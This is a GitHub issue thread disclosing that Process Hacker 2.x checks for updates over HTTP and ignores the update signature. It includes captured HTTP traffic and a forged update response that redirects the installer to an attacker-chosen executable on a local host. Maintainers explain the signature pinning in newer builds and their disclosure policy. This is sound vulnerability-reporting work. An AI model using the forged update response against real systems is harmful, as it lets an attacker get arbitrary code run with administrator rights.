### ISSUE TITLE
[security issue] ProcessHacker updates over HTTP and doesn't verify the signature

### ISSUE THREAD

**Issue by kasif-dekel** [winsiderss/systeminformer#1484]
### Brief description of your issue

While tunneling my machine's traffic through a proxy I noticed a strange packet from ProcessHacker:

```
GET /update.php HTTP/1.1
Cache-Control: no-cache
Pragma: no-cache
Accept-Encoding: gzip, deflate
ProcessHacker-Build: 2.39.124
ProcessHacker-OsBuild: 19041.1.amd64fre.vb_release.191206-1406
Host: processhacker.sourceforge.net
Connection: close



```

Which the server responds with a redirection to HTTPS in order to initiate the update via encrypted communication:

```
HTTP/1.1 301 Moved Permanently
Date: Mon, 14 Nov 2022 11:29:53 GMT
Connection: close
Cache-Control: max-age=3600
Expires: Mon, 14 Nov 2022 12:29:53 GMT
Location: https://processhacker.sourceforge.net/update.php
Vary: Accept-Encoding
Content-Security-Policy: upgrade-insecure-requests
Server: cloudflare
CF-RAY: 769f6977b9218e4a-TLV
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Content-Length: 0

```

But when I replaced this response with an actual update the client seems to accept it without actually verifying the signature, just the hash which is attached to the same response and is under the attacker's control:

```
HTTP/1.1 200 OK
Date: Mon, 14 Nov 2022 11:30:55 GMT
Content-Type: application/xml; charset=UTF-8
Connection: close
Vary: Host,X-Forwarded-Proto
Vary: Accept-Encoding
Expires: Sun, 01 Jan 2014 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
X-From: sfp-ioweb-3
Strict-Transport-Security: max-age=31536000
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 769f6af08cc694dd-HFA
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
Content-Length: 638

<?xml version="1.0" encoding="UTF-8"?>
<latest>
<ver>2.40</ver>
<rev>125</rev>
<sha1>2a35456b2f67bd12905378beb6eaf373f6a0d0d1</sha1>
<sha2>fc6f9dbdf4b9f8dd1f5f3a74cb6e55119d3fe2c9db52436e10ba07842e6c3d7c</sha2>
<sig>9494faa06a0a5bab5c47789b78edd9928d3a9b8d4c1365070e407b004249622a023d3506245feed4146081a248b2b3ccfd2a59486d267421110b97a24c31741d</sig>
<reldate>29th of March 2016</reldate>
<size>2.3 MB</size>
<relnotes>https://wj32.org/processhacker/forums/viewtopic.php?f=1&amp;t=2293</relnotes>
<setupurl>http://192.168.125.1/putty.exe</setupurl>
</latest>
```

In this example above I incremented the version number in order to make the client believe it's a newer version, changed the `<SHA1>` and `<SHA2>` elements accordingly, the client totally ignores the `<SIG>` element. Afterwards, the client offers the user to install it and if the user clicks yes, **it runs it as admin** (with UAC of course).

(In this example I just replaced it with a URL to a PuTTY EXE).

### Expected behavior (optional)

Expected behavior would be to initiate the communication through SSL from the beginning, preferably with SSL pinning.
And also verify the signature of the new update.

**Comment by Biswa96** [comment]
Try the latest nightly build from here https://processhacker.sourceforge.io/nightly.php. Though there is no update for ProcessHacker. The new SystemInformer is in development.

**Comment by kasif-dekel** [comment]
@dmex I'm running Windows 10 21H1 x64.
About the version, I just downloaded the latest version from the website's download page.

**Comment by dmex** [comment]
> I'm running Windows 10 21H1 x64.

Was putty.exe digitally signed?

> SSL pinning isn't just a browser feature

Windows has no application support for pinning.

**Comment by kasif-dekel** [comment]
> Was putty.exe digitally signed?

Yep, but not from "Wen Jia Liu"

> Windows has no application support for pinning.

I'm pretty sure it can be implemented, that the installer will only accept binaries signed by the ProcessHacker (or SystemInformer) certificate and will not accept any signed file since we know that there are even malwares that are digitally signed. I'm saying that because I know other products for Windows that implemented SSL pinning.

**Comment by jxy-s** [comment]
This was fixed a long time ago.

> ProcessHacker-Build: 2.39.124
> ProcessHacker-OsBuild: 19041.1.amd64fre.vb_release.191206-1406

2.x is no longer supported. Users should use the nightly build until 3.x is officially released.

> the client totally ignores the <SIG> element

As @dmex pointed out the nightly _does not_ ignore the signing element of the updater response. 

https://github.com/winsiderss/systeminformer/blob/d46fbcc2cec4f5a7d0fad1848b252e796ecfce4d/plugins/Updater/updater.c#L786-L794

https://github.com/winsiderss/systeminformer/blob/d46fbcc2cec4f5a7d0fad1848b252e796ecfce4d/plugins/Updater/verify.c#L14-L64

This signature validation is effectively the certificate pinning that you're suggesting. In the application binary, we "pin" the public key of the signature validation (seen above). This requires that the downloaded update be signed using our private key. Meaning, in order for this to be a meaningful attack today, the MITM must be able to successfully manipulate the hashes, setup URL, _and most importantly_ signature. Since the MITM can not manipulate the signature the validation of the downloaded binary will fail.

Additionally, this assumes the attacker has a MITM in place to manipulate the SSL stream. SSL certificate pinning isn't something we do, not because we couldn't, but because today we rely on SourceForge to host content for us. Since we don't have full control over that server, we have our own mechanism (explained in the previous paragraph). This ensures information we deliver to users is information we've signed.

Finally, for the future, @kasif-dekel, we have [a process for reporting security vulnerabilities](https://github.com/winsiderss/systeminformer/blob/master/SECURITY.md) that we kindly ask be followed. This ensures project maintainers are given an opportunity to respond to vulnerabilities prior to them being make public. The intention here is not to hide information from the public, any disclosed and verified security vulnerabilities will be fixed and made public through announcements (and by nature of the source being completely open). It just gives us an opportunity to react within a reasonable disclosure deadline to minimize any potential damage done by a bad actor.

**Comment by kasif-dekel** [comment]
Thanks for your elaborated answer.

I totally agree that if it fixed in later versions the issue should be closed but I just suggest to remove the “Recommended” section from the websites which advises you to download the latest 2.x, which is again, vulnerable.

About the SSL pinning, I just said it as a best practice.


And I didn’t know about the designated process for reporting security vulnerabilities, so sorry about that.

Thanks again!
